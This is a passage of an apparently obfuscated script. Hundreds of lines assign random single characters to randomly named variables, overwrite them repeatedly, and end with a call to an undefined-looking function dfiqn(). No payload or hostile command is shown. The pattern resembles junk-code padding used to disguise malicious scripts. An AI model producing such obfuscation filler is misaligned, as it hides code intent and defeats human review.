786 | dmeqkmac = "u"; | |
787 | dmeqkmac = "e"; | |
788 | dmeqkmac = "T"; | |
789 | dmeqkmac = "j"; | |
790 | dmeqkmac = "z"; | |
791 | dmeqkmac = "a"; | |
792 | dmeqkmac = "I"; | |
793 | dmeqkmac = "l"; | |
794 | dmeqkmac = "z"; | |
795 | dmeqkmac = "I"; | |
796 | dmeqkmac = "Q"; | |
797 | dmeqkmac = "Y"; | |
798 | dmeqkmac = "J"; | |
799 | dmeqkmac = "x"; | |
800 | dmeqkmac = "S"; | |
801 | dmeqkmac = "f"; | |
802 | dmeqkmac = "D"; | |
803 | dmeqkmac = "Q"; | |
804 | dmeqkmac = "I"; | |
805 | dmeqkmac = "d"; | |
806 | anmckzaza = "K"; | |
807 | anmckzaza = "S"; | |
808 | anmckzaza = "r"; | |
809 | anmckzaza = "Q"; | |
810 | anmckzaza = "o"; | |
811 | anmckzaza = "T"; | |
812 | anmckzaza = "T"; | |
813 | anmckzaza = "T"; | |
814 | anmckzaza = "D"; | |
815 | anmckzaza = "m"; | |
816 | anmckzaza = "w"; | |
817 | anmckzaza = "d"; | |
818 | anmckzaza = "a"; | |
819 | anmckzaza = "r"; | |
820 | anmckzaza = "I"; | |
821 | anmckzaza = "X"; | |
822 | anmckzaza = "e"; | |
823 | anmckzaza = "f"; | |
824 | anmckzaza = "w"; | |
825 | anmckzaza = "s"; | |
826 | anmckzaza = "S"; | |
827 | anmckzaza = "J"; | |
828 | anmckzaza = "t"; | |
829 | anmckzaza = "n"; | |
830 | anmckzaza = "X"; | |
831 | anmckzaza = "z"; | |
832 | anmckzaza = "A"; | |
833 | anmckzaza = "I"; | |
834 | anmckzaza = "V"; | |
835 | anmckzaza = "t"; | |
836 | anmckzaza = "e"; | |
837 | anmckzaza = "N"; | |
838 | anmckzaza = "H"; | |
839 | anmckzaza = "k"; | |
840 | anmckzaza = "E"; | |
841 | anmckzaza = "S"; | |
842 | anmckzaza = "V"; | |
843 | anmckzaza = "K"; | |
844 | anmckzaza = "F"; | |
845 | anmckzaza = "q"; | |
846 | anmckzaza = "V"; | |
847 | anmckzaza = "9"; | |
848 | ujanb = "E"; | |
849 | ujanb = "u"; | |
850 | ujanb = "s"; | |
851 | ujanb = "D"; | |
852 | ujanb = "e"; | |
853 | ujanb = "I"; | |
854 | ujanb = "r"; | |
855 | ujanb = "q"; | |
856 | ujanb = "q"; | |
857 | hxqcyhxwb = "A"; | |
858 | hxqcyhxwb = "K"; | |
859 | hxqcyhxwb = "l"; | |
860 | hxqcyhxwb = "g"; | |
861 | hxqcyhxwb = "a"; | |
862 | hxqcyhxwb = "M"; | |
863 | hxqcyhxwb = "l"; | |
864 | hxqcyhxwb = "s"; | |
865 | hxqcyhxwb = "u"; | |
866 | hxqcyhxwb = "C"; | |
867 | hxqcyhxwb = "O"; | |
868 | hxqcyhxwb = "y"; | |
869 | hxqcyhxwb = "x"; | |
870 | hxqcyhxwb = "d"; | |
871 | hxqcyhxwb = "W"; | |
872 | hxqcyhxwb = "K"; | |
873 | hxqcyhxwb = "Y"; | |
874 | hxqcyhxwb = "l"; | |
875 | hxqcyhxwb = "s"; | |
876 | hxqcyhxwb = "Q"; | |
877 | hxqcyhxwb = "Q"; | |
878 | hxqcyhxwb = "V"; | |
879 | hxqcyhxwb = "T"; | |
880 | hxqcyhxwb = "H"; | |
881 | hxqcyhxwb = "g"; | |
882 | hxqcyhxwb = "Z"; | |
883 | hxqcyhxwb = "K"; | |
884 | plyrm = "j"; | |
885 | plyrm = "d"; | |
886 | plyrm = "q"; | |
887 | plyrm = "K"; | |
888 | plyrm = "S"; | |
889 | plyrm = "n"; | |
890 | plyrm = "x"; | |
891 | plyrm = "w"; | |
892 | plyrm = "v"; | |
893 | plyrm = "r"; | |
894 | plyrm = "e"; | |
895 | plyrm = "p"; | |
896 | plyrm = "K"; | |
897 | plyrm = "W"; | |
898 | fwvhhu = "z"; | |
899 | fwvhhu = "u"; | |
900 | fwvhhu = "f"; | |
901 | fwvhhu = "m"; | |
902 | fwvhhu = "d"; | |
903 | fwvhhu = "b"; | |
904 | fwvhhu = "f"; | |
905 | fwvhhu = "k"; | |
906 | fwvhhu = "D"; | |
907 | fwvhhu = "x"; | |
908 | fwvhhu = "t"; | |
909 | fwvhhu = "z"; | |
910 | fwvhhu = "h"; | |
911 | fwvhhu = "q"; | |
912 | fwvhhu = "V"; | |
913 | fwvhhu = "M"; | |
914 | fwvhhu = "i"; | |
915 | fwvhhu = "J"; | |
916 | fwvhhu = "g"; | |
917 | fwvhhu = "G"; | |
918 | fwvhhu = "k"; | |
919 | fwvhhu = "U"; | |
920 | fwvhhu = "f"; | |
921 | fwvhhu = "f"; | |
922 | fwvhhu = "g"; | |
923 | fwvhhu = "B"; | |
924 | fwvhhu = "X"; | |
925 | fwvhhu = "F"; | |
926 | fwvhhu = "e"; | |
927 | fwvhhu = "j"; | |
928 | fwvhhu = "m"; | |
929 | fwvhhu = "r"; | |
930 | fwvhhu = "d"; | |
931 | fwvhhu = "a"; | |
932 | fwvhhu = "T"; | |
933 | fwvhhu = "F"; | |
934 | fwvhhu = "w"; | |
935 | fwvhhu = "t"; | |
936 | bvloqrb = "z"; | |
937 | bvloqrb = "s"; | |
938 | bvloqrb = "A"; | |
939 | bvloqrb = "u"; | |
940 | bvloqrb = "0"; | |
941 | xpjzic = "B"; | |
942 | xpjzic = "H"; | |
943 | xpjzic = "/"; | |
944 | nrqacu = "h"; | |
945 | nrqacu = "C"; | |
946 | nrqacu = "t"; | |
947 | nrqacu = "L"; | |
948 | nrqacu = "M"; | |
949 | nrqacu = "j"; | |
950 | nrqacu = "y"; | |
951 | nrqacu = "W"; | |
952 | nrqacu = "E"; | |
953 | nrqacu = "I"; | |
954 | nrqacu = "d"; | |
955 | nrqacu = "D"; | |
956 | nrqacu = "i"; | |
957 | nrqacu = "H"; | |
958 | nrqacu = "M"; | |
959 | nrqacu = "O"; | |
960 | nrqacu = "H"; | |
961 | nrqacu = "t"; | |
962 | nrqacu = "d"; | |
963 | nrqacu = "X"; | |
964 | nrqacu = "m"; | |
965 | nrqacu = "n"; | |
966 | nrqacu = "M"; | |
967 | nrqacu = "K"; | |
968 | nrqacu = "Y"; | |
969 | nrqacu = "a"; | |
970 | nrqacu = "z"; | |
971 | nrqacu = "W"; | |
972 | nrqacu = "s"; | |
973 | glilcdfn = "a"; | |
974 | glilcdfn = "e"; | |
975 | glilcdfn = "U"; | |
976 | glilcdfn = "c"; | |
977 | glilcdfn = "A"; | |
978 | glilcdfn = "D"; | |
979 | glilcdfn = "U"; | |
980 | ezvmgi = "m"; | |
981 | ezvmgi = "d"; | |
982 | ezvmgi = "Y"; | |
983 | ezvmgi = "h"; | |
984 | ezvmgi = "O"; | |
985 | ezvmgi = "j"; | |
986 | ezvmgi = "L"; | |
987 | ezvmgi = "F"; | |
988 | ezvmgi = "f"; | |
989 | ezvmgi = "U"; | |
990 | ezvmgi = "T"; | |
991 | ezvmgi = "H"; | |
992 | ezvmgi = "Y"; | |
993 | ezvmgi = "c"; | |
994 | ezvmgi = "Y"; | |
995 | ezvmgi = "d"; | |
996 | ezvmgi = "J"; | |
997 | ezvmgi = "b"; | |
998 | ezvmgi = "N"; | |
999 | ezvmgi = "e"; | |
1000 | ezvmgi = "H"; | |
1001 | ezvmgi = "J"; | |
1002 | ezvmgi = "g"; | |
1003 | ezvmgi = "H"; | |
1004 | ezvmgi = "c"; | |
1005 | ezvmgi = "x"; | |
1006 | ezvmgi = "I"; | |
1007 | ezvmgi = "o"; | |
1008 | ezvmgi = "X"; | |
1009 | ezvmgi = "F"; | |
1010 | ezvmgi = "g"; | |
1011 | ezvmgi = "D"; | |
1012 | ezvmgi = "y"; | |
1013 | ezvmgi = "t"; | |
1014 | ezvmgi = "N"; | |
1015 | ezvmgi = "W"; | |
1016 | ezvmgi = "z"; | |
1017 | ezvmgi = "Z"; | |
1018 | ezvmgi = "Y"; | |
1019 | ezvmgi = "X"; | |
1020 | ezvmgi = "B"; | |
1021 | ezvmgi = "a"; | |
1022 | ezvmgi = "C"; | |
1023 | ezvmgi = "D"; | |
1024 | ezvmgi = "."; | |
1025 | yjrezl = "N"; | |
1026 | yjrezl = "R"; | |
1027 | yjrezl = "V"; | |
1028 | yjrezl = "K"; | |
1029 | yjrezl = "A"; | |
1030 | yjrezl = "H"; | |
1031 | yjrezl = "J"; | |
1032 | yjrezl = "k"; | |
1033 | yjrezl = "l"; | |
1034 | yjrezl = "l"; | |
1035 | yjrezl = "e"; | |
1036 | yjrezl = "C"; | |
1037 | yjrezl = "o"; | |
1038 | yjrezl = "c"; | |
1039 | yjrezl = "Z"; | |
1040 | yjrezl = "I"; | |
1041 | yjrezl = "w"; | |
1042 | yjrezl = "p"; | |
1043 | fkgzve = "V"; | |
1044 | fkgzve = "D"; | |
1045 | fkgzve = "i"; | |
1046 | fkgzve = "w"; | |
1047 | fkgzve = "v"; | |
1048 | fkgzve = "o"; | |
1049 | fkgzve = "S"; | |
1050 | fkgzve = "I"; | |
1051 | jiadq = "K"; | |
1052 | jiadq = "G"; | |
1053 | jiadq = "j"; | |
1054 | jiadq = "w"; | |
1055 | jiadq = "C"; | |
1056 | jiadq = "U"; | |
1057 | jiadq = "B"; | |
1058 | jiadq = "P"; | |
1059 | jiadq = "t"; | |
1060 | jiadq = "i"; | |
1061 | jiadq = "M"; | |
1062 | jiadq = "H"; | |
1063 | jiadq = "R"; | |
1064 | jiadq = "H"; | |
1065 | jiadq = "H"; | |
1066 | jiadq = "O"; | |
1067 | ebovu = "z"; | |
1068 | ebovu = "Y"; | |
1069 | ebovu = "k"; | |
1070 | ebovu = "t"; | |
1071 | ebovu = "h"; | |
1072 | ebovu = "W"; | |
1073 | ebovu = "n"; | |
1074 | ebovu = "f"; | |
1075 | ebovu = "H"; | |
1076 | ebovu = "C"; | |
1077 | ebovu = "w"; | |
1078 | ebovu = "g"; | |
1079 | ebovu = "A"; | |
1080 | ebovu = "A"; | |
1081 | ebovu = "k"; | |
1082 | ebovu = "z"; | |
1083 | ebovu = "C"; | |
1084 | ebovu = "D"; | |
1085 | ebovu = "o"; | |
1086 | ebovu = "G"; | |
1087 | ebovu = "u"; | |
1088 | ebovu = "r"; | |
1089 | ebovu = "F"; | |
1090 | ebovu = "K"; | |
1091 | ebovu = "q"; | |
1092 | ebovu = "E"; | |
1093 | ebovu = "V"; | |
1094 | ebovu = "z"; | |
1095 | ebovu = "D"; | |
1096 | ebovu = "N"; | |
1097 | ebovu = "U"; | |
1098 | ebovu = "o"; | |
1099 | ebovu = "u"; | |
1100 | ebovu = "r"; | |
1101 | ebovu = "P"; | |
1102 | ebovu = "s"; | |
1103 | ebovu = "A"; | |
1104 | ebovu = "k"; | |
1105 | ebovu = "T"; | |
1106 | ksbwvzcqs = "B"; | |
1107 | ksbwvzcqs = "p"; | |
1108 | ksbwvzcqs = "b"; | |
1109 | ksbwvzcqs = "c"; | |
1110 | ksbwvzcqs = "R"; | |
1111 | ksbwvzcqs = "Q"; | |
1112 | ksbwvzcqs = "X"; | |
1113 | ksbwvzcqs = "I"; | |
1114 | ksbwvzcqs = "N"; | |
1115 | ksbwvzcqs = "Q"; | |
1116 | ksbwvzcqs = "A"; | |
1117 | ksbwvzcqs = "f"; | |
1118 | ksbwvzcqs = "H"; | |
1119 | ksbwvzcqs = "8"; | |
1120 | xhcip = "q"; | |
1121 | xhcip = "j"; | |
1122 | xhcip = "R"; | |
1123 | xhcip = "i"; | |
1124 | xhcip = "t"; | |
1125 | xhcip = "J"; | |
1126 | xhcip = "s"; | |
1127 | xhcip = "d"; | |
1128 | xhcip = "p"; | |
1129 | xhcip = "n"; | |
1130 | xhcip = "x"; | |
1131 | xhcip = "l"; | |
1132 | xhcip = "S"; | |
1133 | xhcip = "j"; | |
1134 | xhcip = "x"; | |
1135 | xhcip = "f"; | |
1136 | xhcip = "@"; | |
1137 | kwlbrchj = "x"; | |
1138 | kwlbrchj = "Y"; | |
1139 | kwlbrchj = "C"; | |
1140 | kwlbrchj = "N"; | |
1141 | kwlbrchj = "T"; | |
1142 | kwlbrchj = "G"; | |
1143 | kwlbrchj = "h"; | |
1144 | kwlbrchj = "u"; | |
1145 | kwlbrchj = "o"; | |
1146 | kwlbrchj = "l"; | |
1147 | kwlbrchj = "N"; | |
1148 | kwlbrchj = "I"; | |
1149 | kwlbrchj = "u"; | |
1150 | kwlbrchj = "N"; | |
1151 | kwlbrchj = "f"; | |
1152 | kwlbrchj = "F"; | |
1153 | kwlbrchj = "W"; | |
1154 | kwlbrchj = "G"; | |
1155 | kwlbrchj = "7"; | |
1156 | vzihw = "n"; | |
1157 | vzihw = "Q"; | |
1158 | vzihw = "W"; | |
1159 | vzihw = "F"; | |
1160 | vzihw = "k"; | |
1161 | vzihw = "B"; | |
1162 | vzihw = "F"; | |
1163 | vzihw = "k"; | |
1164 | vzihw = "C"; | |
1165 | vzihw = "j"; | |
1166 | vzihw = "e"; | |
1167 | vzihw = "z"; | |
1168 | vzihw = "q"; | |
1169 | vzihw = "Q"; | |
1170 | vzihw = "o"; | |
1171 | vzihw = "J"; | |
1172 | vzihw = "M"; | |
1173 | vzihw = "e"; | |
1174 | vzihw = "O"; | |
1175 | vzihw = "H"; | |
1176 | vzihw = "K"; | |
1177 | vzihw = "O"; | |
1178 | vzihw = "B"; | |
1179 | vzihw = "g"; | |
1180 | vzihw = "P"; | |
1181 | vzihw = "v"; | |
1182 | vzihw = "m"; | |
1183 | vzihw = "k"; | |
1184 | vzihw = "H"; | |
1185 | vzihw = "M"; | |
1186 | vzihw = "n"; | |
1187 | vzihw = "O"; | |
1188 | vzihw = "r"; | |
1189 | vzihw = "u"; | |
1190 | vzihw = "g"; | |
1191 | vzihw = "t"; | |
1192 | vzihw = "R"; | |
1193 | vzihw = "s"; | |
1194 | vzihw = "j"; | |
1195 | vzihw = "a"; | |
1196 | vzihw = "A"; | |
1197 | vzihw = "q"; | |
1198 | vzihw = "c"; | |
1199 | sjiqqn = "u"; | |
1200 | sjiqqn = "L"; | |
1201 | sjiqqn = "X"; | |
1202 | sjiqqn = "x"; | |
1203 | sjiqqn = "j"; | |
1204 | sjiqqn = "P"; | |
1205 | sjiqqn = "r"; | |
1206 | sjiqqn = "G"; | |
1207 | sjiqqn = "H"; | |
1208 | sjiqqn = "M"; | |
1209 | sjiqqn = "B"; | |
1210 | sjiqqn = "c"; | |
1211 | sjiqqn = "c"; | |
1212 | sjiqqn = "K"; | |
1213 | sjiqqn = "b"; | |
1214 | sjiqqn = "z"; | |
1215 | sjiqqn = "J"; | |
1216 | sjiqqn = "O"; | |
1217 | sjiqqn = "x"; | |
1218 | sjiqqn = "i"; | |
1219 | sjiqqn = "h"; | |
1220 | sjiqqn = "k"; | |
1221 | sjiqqn = "v"; | |
1222 | sjiqqn = "s"; | |
1223 | sjiqqn = "M"; | |
1224 | sjiqqn = "Q"; | |
1225 | sjiqqn = "O"; | |
1226 | sjiqqn = "g"; | |
1227 | sjiqqn = "p"; | |
1228 | sjiqqn = "p"; | |
1229 | sjiqqn = "J"; | |
1230 | sjiqqn = "W"; | |
1231 | sjiqqn = "M"; | |
1232 | sjiqqn = "G"; | |
1233 | sjiqqn = "3"; | |
1234 | qaryvrhu = "y"; | |
1235 | qaryvrhu = "U"; | |
1236 | qaryvrhu = "Z"; | |
1237 | qaryvrhu = "Y"; | |
1238 | qaryvrhu = "I"; | |
1239 | qaryvrhu = "K"; | |
1240 | qaryvrhu = "U"; | |
1241 | qaryvrhu = "E"; | |
1242 | qaryvrhu = "z"; | |
1243 | qaryvrhu = "6"; | |
1244 | vjmlu = "g"; | |
1245 | vjmlu = "H"; | |
1246 | vjmlu = "u"; | |
1247 | gholxjri = "W"; | |
1248 | gholxjri = "v"; | |
1249 | gholxjri = "h"; | |
1250 | gholxjri = "W"; | |
1251 | gholxjri = "s"; | |
1252 | gholxjri = "Q"; | |
1253 | gholxjri = "b"; | |
1254 | gholxjri = "y"; | |
1255 | gholxjri = "z"; | |
1256 | gholxjri = "o"; | |
1257 | gholxjri = "L"; | |
1258 | gholxjri = "l"; | |
1259 | gholxjri = "D"; | |
1260 | gholxjri = "d"; | |
1261 | gholxjri = "d"; | |
1262 | gholxjri = "s"; | |
1263 | gholxjri = "o"; | |
1264 | gholxjri = "L"; | |
1265 | gholxjri = "R"; | |
1266 | gholxjri = "e"; | |
1267 | gholxjri = "n"; | |
1268 | gholxjri = "u"; | |
1269 | gholxjri = "B"; | |
1270 | gholxjri = "O"; | |
1271 | gholxjri = "K"; | |
1272 | gholxjri = "e"; | |
1273 | gholxjri = "G"; | |
1274 | gholxjri = "R"; | |
1275 | gholxjri = "Z"; | |
1276 | gholxjri = "K"; | |
1277 | gholxjri = "i"; | |
1278 | gholxjri = "Y"; | |
1279 | gholxjri = "K"; | |
1280 | gholxjri = "v"; | |
1281 | gholxjri = "B"; | |
1282 | gholxjri = "Z"; | |
1283 | gholxjri = "f"; | |
1284 | gholxjri = "f"; | |
1285 | gholxjri = "o"; | |
1286 | gholxjri = "d"; | |
1287 | gholxjri = "W"; | |
1288 | gholxjri = "E"; | |
1289 | gholxjri = "F"; | |
1290 | gholxjri = "y"; | |
1291 | gholxjri = ":"; | |
1292 | leqjnkin = "o"; | |
1293 | leqjnkin = "b"; | |
1294 | leqjnkin = "W"; | |
1295 | leqjnkin = "v"; | |
1296 | leqjnkin = "C"; | |
1297 | leqjnkin = "O"; | |
1298 | leqjnkin = "x"; | |
1299 | leqjnkin = "q"; | |
1300 | leqjnkin = "f"; | |
1301 | leqjnkin = "M"; | |
1302 | leqjnkin = "D"; | |
1303 | leqjnkin = "m"; | |
1304 | leqjnkin = "v"; | |
1305 | leqjnkin = "d"; | |
1306 | leqjnkin = "S"; | |
1307 | leqjnkin = "M"; | |
1308 | leqjnkin = "O"; | |
1309 | leqjnkin = "A"; | |
1310 | leqjnkin = "Z"; | |
1311 | leqjnkin = "z"; | |
1312 | leqjnkin = "s"; | |
1313 | leqjnkin = "I"; | |
1314 | leqjnkin = "X"; | |
1315 | leqjnkin = "R"; | |
1316 | leqjnkin = "z"; | |
1317 | leqjnkin = "c"; | |
1318 | leqjnkin = "S"; | |
1319 | leqjnkin = "M"; | |
1320 | leqjnkin = "L"; | |
1321 | leqjnkin = "t"; | |
1322 | leqjnkin = "O"; | |
1323 | leqjnkin = "h"; | |
1324 | ztujv = "Z"; | |
1325 | ztujv = "Z"; | |
1326 | ztujv = "U"; | |
1327 | ztujv = "M"; | |
1328 | ztujv = "n"; | |
1329 | ztujv = "O"; | |
1330 | ztujv = "l"; | |
1331 | ztujv = "Y"; | |
1332 | ztujv = "Z"; | |
1333 | ztujv = "X"; | |
1334 | ztujv = "B"; | |
1335 | ztujv = "I"; | |
1336 | ztujv = "S"; | |
1337 | ztujv = "w"; | |
1338 | ztujv = "i"; | |
1339 | ztujv = "d"; | |
1340 | ztujv = "h"; | |
1341 | ztujv = "Z"; | |
1342 | ztujv = "F"; | |
1343 | ztujv = "l"; | |
1344 | ztujv = "K"; | |
1345 | ztujv = "s"; | |
1346 | ztujv = "T"; | |
1347 | ztujv = "h"; | |
1348 | ztujv = "s"; | |
1349 | ztujv = "Q"; | |
1350 | ztujv = "G"; | |
1351 | ztujv = "E"; | |
1352 | ztujv = "k"; | |
1353 | ztujv = "U"; | |
1354 | ztujv = "f"; | |
1355 | ztujv = "_"; | |
1356 | dxbgjacs = "p"; | |
1357 | dxbgjacs = "O"; | |
1358 | dxbgjacs = "w"; | |
1359 | dxbgjacs = "z"; | |
1360 | dxbgjacs = "H"; | |
1361 | dxbgjacs = "p"; | |
1362 | dxbgjacs = "d"; | |
1363 | dxbgjacs = "a"; | |
1364 | dxbgjacs = "l"; | |
1365 | dxbgjacs = "P"; | |
1366 | dxbgjacs = "O"; | |
1367 | dxbgjacs = "s"; | |
1368 | dxbgjacs = "g"; | |
1369 | maizwe = "v"; | |
1370 | maizwe = "j"; | |
1371 | maizwe = "M"; | |
1372 | maizwe = "b"; | |
1373 | maizwe = "I"; | |
1374 | maizwe = "x"; | |
1375 | maizwe = "D"; | |
1376 | maizwe = "O"; | |
1377 | maizwe = "A"; | |
1378 | maizwe = "q"; | |
1379 | maizwe = "m"; | |
1380 | maizwe = "C"; | |
1381 | maizwe = "x"; | |
1382 | maizwe = "V"; | |
1383 | maizwe = "w"; | |
1384 | maizwe = "j"; | |
1385 | maizwe = "f"; | |
1386 | maizwe = "z"; | |
1387 | maizwe = "e"; | |
1388 | maizwe = "l"; | |
1389 | maizwe = "z"; | |
1390 | maizwe = "s"; | |
1391 | maizwe = "E"; | |
1392 | maizwe = "Q"; | |
1393 | maizwe = "f"; | |
1394 | maizwe = "D"; | |
1395 | maizwe = "i"; | |
1396 | maizwe = "Y"; | |
1397 | maizwe = "E"; | |
1398 | maizwe = "f"; | |
1399 | dfiqn ( ); |
|